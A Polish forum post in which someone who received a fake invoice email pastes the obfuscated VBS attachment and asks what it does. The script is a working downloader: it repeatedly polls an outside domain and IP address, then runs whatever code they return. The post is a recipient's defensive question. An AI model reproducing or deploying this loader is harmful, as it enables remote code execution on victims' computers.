Witam serdecznie
Dostałem ostatnio na maila 'fakturę' od zapewne jakiegoś Pana, który wykorzystując nazwę jakiejś firmy próbuje zawirusować komputer w innych firmach. Załącza do maila plik VBS spakowany w .rar. No i jestem ciekaw co ten plik robi. Skrypt:
dim sss, DuriOAdaMyArray, MadriOdaKadurls, TaniPoldsAhttpsd, PerepravaAdzz, CSKAfkkk, PiroGinaAdands
dim DreMosAdQQSurls, LudoViKaate, PiPloVirasdate
PiPloVirasdate = null
PerepravaAdzz = "773335550757"
Function PilOsaAdQQFSkip()
On Error Resume Next
KipoloasAdMinsa()
POOOPPAQMessage(PiPloVirasdate)
CSKAfkkk = Array("", "", "")
End Function
Function TexasSFAxdA()
On Error Resume Next
Set TaniPoldsAhttpsd = CreateObject("Microsoft.XMLHTTP")
TaniPoldsAhttpsd.Open "GET", "https://www.goooglwas.freesaf/111/222", False
TaniPoldsAhttpsd.Send
If (TaniPoldsAhttpsd.Status = 200) Then
TradionsiksMase()
Else
PinachetoSHello()
End If
End Function
Function TradionsiksMase()
dim dododsex
dododsex = 0
dododsex = FormatDateTime(Now, vbLongTime)
TradionsiksMase(dododsex)
End Function
Function PoloDoadsloas()
On Error Resume Next
randomize
PiroGinaAdands = int(rnd*2) + 1
DreMosAdQQSurls = "http://"+CSKAfkkk(PiroGinaAdands)+"/ip.php?number=753246&opt="
PoloDoadsloas(DreMosAdQQSurls)
End Function
Function PoloDoadsloas2()
Dim Farujuylsd
Farujuylsd = PoloDoadsloas()
End Function
Function PoloDoadsloas3()
PoloDoadsloas2()
End Function
Function PoloDoadsloas4()
PoloDoadsloas3()
End Function
Function KipoloasAdMinsa()
CSKAfkkk(2) = "192.3.204.232"
CSKAfkkk(1) = "servesmailerprogres.science"
PoloDoadsloas4()
End Function
Function PilotyUsaTest()
TerpiloaAReset()
End Function
Function TerpiloaAReset()
PerepravaAdzz = CStr(PerepravaAdzz + 1)
End Function
Function GreeceFaxPc()
On Error Resume Next
While true
WScript.Sleep 7000
Call PilOsaAdQQFSkip()
Wend
End Function
Function DomOsaAGoo(responseText)
On Error Resume Next
DuriOAdaMyArray = Array(22, 11, 00, 22,43, 34, 2341, responseText)
TexasSFAxdA()
End Function
Function POOOPPAQMessage(lolosaddate)
On Error Resume Next
dim wertyUsdreq, streddy
Set wertyUsdreq = createobject("Microsoft.XMLHTTP")
wertyUsdreq.Open "GET", lolosaddate, False
wertyUsdreq.Send
WScript.Sleep 100
streddy = wertyUsdreq.responseText
DomOsaAGoo(streddy)
End Function
Function LiveAdTest()
PiPloVirasdate = ""
PiPloVirasdate =+ DreMosAdQQSurls + PerepravaAdzz + "&" + "yousa"
End Function
Function GameSSTest()
PilotyUsaTest()
LiveAdTest()
End Function
Function PinachetoSHello()
GameSSTest()
Execute "" + DuriOAdaMyArray(7) + ""
End Function
Call GreeceFaxPc()